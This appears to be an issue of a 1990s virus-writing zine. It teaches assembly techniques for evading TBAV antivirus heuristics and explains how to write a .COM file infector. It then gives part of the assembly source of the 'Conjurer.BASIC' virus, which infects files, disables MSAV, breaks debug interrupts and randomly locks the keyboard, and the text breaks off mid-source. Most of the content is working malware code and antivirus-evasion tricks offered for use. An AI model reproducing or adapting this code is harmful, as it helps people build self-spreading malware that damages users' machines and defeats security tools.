------------------------------Immortal Virus Magazine-------------------------
-----------------------------------Issue 95.1----------------------------------
-----------------------------TBAV fooling techniques---------------------------

The heuristic scans we will discuss are:

- F : Suspicious file-access
- S : Search for .EXE / .COM files
- D : Direct disk access
- # : Encryption and/or debugger trap
- G : Garbage instructions
- E : Flexible entrypoint

-------------------------------------------------------------------------------

- F : Suspicious file-access

There are different ways to fool TBAV on this one.

1.) The easiest way is to add 10 or something at the MOVe instruction and then
    SUBtract 10: TBAV will think you use the original MOVe.

    e.g:

    MOV AH, 50h
    SUB AH, 10h         ;50h will turn into 40h = Dos fnc: Write
    INT 21h

2.) This is a bit tougher: you redirect int 21h to some other unused interrupt.
    There is no need to unlink the new interrupt.

    e.g:

    MOV AX, 3521h       ;Get dos int address in ES:BX
    INT 21H
    PUSH ES             ;DS == ES
    POP DS
    MOV AX, 2560h       ;Int 60H will become int 21h
    INT 21h
    MOV AH, 40h         ;Dos fnc: Write
    INT 60h             ;The new interrupt

-------------------------------------------------------------------------------

- S : Search for .EXE / .COM files

There are again a few ways to fool TBAV on this one.

1.) Somewhere in your virus is a filespec (e.g. '*.COM'). Just change the '*'
    into something else ('Z.COM'), and when the function 3Fh or something is
    called change it to a '*' again; afterwards change it to a 'Z' again.

    e.g:

    MOV BYTE PTR [FSPC+BP],'*'
    MOV AX,3F00h
    INT 21h
    MOV BYTE PTR [FSPC+BP],'Z'

    FSPC DB 'Z.COM',0

2.) You can also use the first technique about hiding the 'F' flag.

-------------------------------------------------------------------------------

- D : Direct disk access

Once again there are a few ways to let TBAV eat his 'D' flag.

1.) Change the INT 26h at runtime: create a label or something and put an
    int 21h or something there, and change it to int 26h in your virus.

    e.g.

    MOV BYTE PTR [I26L+1+BP],26h    ;Change INT 21h to INT 26h
    I26L: INT 21h                   ;Here will be the INT 26h
    MOV BYTE PTR [I26L+1+BP],21h    ;Change INT 26h to INT 21h

2.) You can also use the second technique about hiding the 'F' flag.

-------------------------------------------------------------------------------

- # : Encryption and/or debugger trap

Once again there are several ways to shit TBAV.

1.) For a debugger trap you can use the first technique about the 'F' flag.

2.) Use an illogical call structure. First CALL the decryption routine, then
    JuMP to the main virus.

    e.g.

    CALL DC         ;Call your decryption routine
    JMP ST          ;JuMP to the start of your virus
    NOP             ;To fool TBAV
    ST: .           ;Put your virus here
        .
        .
    DC: RET         ;Put the decryption routine here!

-------------------------------------------------------------------------------

- G : Garbage instructions

There's one thing to do to get rid of this flag. OPTIMIZE!

e.g. You can turn two NOPs into two eXCHanGes:

    NOP
    NOP

will be:

    XCHG AX,BX
    XCHG CX,AX

or something like that. You can also put often used routines in a CALL routine
(e.g. Get Time, etc).

-------------------------------------------------------------------------------

- E : Flexible entry-point

There are many ways to avoid this; the best one is to put this little routine
at the beginning of your virus:

    XCHG AX,BX      ;Avoid 'G' & 'E' flags
    XCHG CX,AX
    CALL DELTA
    DELTA: POP BP
    SUB BP, OFFSET DELTA

Entrypoint will be in BP.

-------------------------------------------------------------------------------

By: [Hacking Hell]

------------------------------Immortal Virus Magazine-------------------------
-----------------------------------Issue 95.1----------------------------------
--------------------------The basics of a .COM infector------------------------

We'll begin with the search .COM routine of a virus. The best way is to use
function 4Eh & 4Fh.
- Function 4Eh   Find first file

  Inputs:  It needs a DTA set.
           DS:DX = Filespec
           BX    = Attribute
  Outputs: DTA + 1Eh = Filename + 0 byte

- Function 4Fh   Find next file

  Inputs:  By function 4Eh or 4Fh pre-initiated DTA
  Outputs: DTA + 1Eh = Filename + 0 byte

Now, the implementation technique. I think the best way is to make a four byte
jump table and an original bytes table. The jump table consists of an 0E9h
byte, two 00h bytes and an identification byte (eg. DB 0E9h,00h,00h,'C'); in
the original bytes table the first four bytes of the host will be stored.
First read the original bytes, store them in the org. bytes table, append the
virus at the end, calculate the jump offset, place it in the jump table, and
write the jump table at the beginning of the victim file.

- Function 3Dh   Open file

  Inputs:  AL    = Mode ( 02h = Random access )
           DS:DX = Filename ( eg. DTA + 1Eh )
  Outputs: AX    = File-handle ( eXCHanGe to BX for other functions )

- Function 3Fh   Read from file

  Inputs:  CX    = Bytes to read
           DS:DX = Destination of read
           BX    = File-handle

- Function 42h   Set file-pointer

  Inputs:  AL    = Mode ( 00h = From SOF / 02h = From EOF )
           DX:CX = Offset in file ( 0:0 for SOF / EOF )

- Function 40h   Write into file

  Inputs:  CX    = Bytes to write
           DS:DX = Offset of data to write
           BX    = File-handle

- Function 3Eh   Close file

  Inputs:  BX    = File-handle

Now here follows the assembly source and a debug script of the Conjurer Basic
virus, created by [Hacking Hell] & [Cyborg]. It's 270 bytes large and a good
example virus for the techniques you may have learned...

-------------------------------------<CUT>-------------------------------------

; Conjurer.BASIC virus...

%OUT CoNJuReR.BASIC virus by [Hacking Hell] & [Cyborg]
%OUT Appending non-descructive non-resident non-flagged virus.
%OUT Features:
%OUT - Anti trace meganism
%OUT - 99% TBAV proof (almost no flags)
%OUT - Traversal (DotDot technique)
%OUT - Little message
%OUT - 13% chance for a keyboard lock

.model tiny
.code

        ORG 100h                ;COM file remember?!?

dummy:  db 0e9h,02h,00h         ;The dummy host: jump to START
        db 'C'                  ;Already infected marker
        ret                     ;Exit from dummy

start:  push cx                 ;Some junk to fool TBAV
        pop bx
        mov ax,0fa01h           ;Let's take down MSAV!!!
        mov dx,05945h
        int 16h
        call getdlt             ;Nice way to get delta offset!
realst:
getdlt: pop bp
        sub bp, offset getdlt
        call encdec
        jmp codest
        nop                     ;TBAV eats '#'
codest: lea si,[orgbts+bp]      ;Restore first 4 bytes
        mov di,0100h
        movsw
        movsw
        push cs                 ;DS <==> CS
        pop ds
        lea dx,[eov+bp]         ;Set DTA address
        mov ah,1ah
        int 21h
        mov ax,3501h            ;Crash INT 1
        sub ah,10h
        mov bx,0000h
        mov es,bx
        int 21h
        mov al,03h              ;Crash INT 3
        int 21h
        mov ah,2ch              ;13% chance to lock keyboard!
        int 21h
        cmp dl, 0dh
        jg nolock
lockkb: mov al,82h              ;Keyboard lock!
        out 21h,al
nolock: mov ah,2ch              ;50% chance to print message!
        int 21h
        cmp dl,32h
        jl spread
        mov ah,09h              ;Bingo! print message!
        lea dx, [bp+offset welcome]
        int 21h
        mov ah,00h              ;Wait for a key!
        int 16h
        jmp spread

welcome db 'CoNJuReR.BSC!',07h,0ah,0dh,'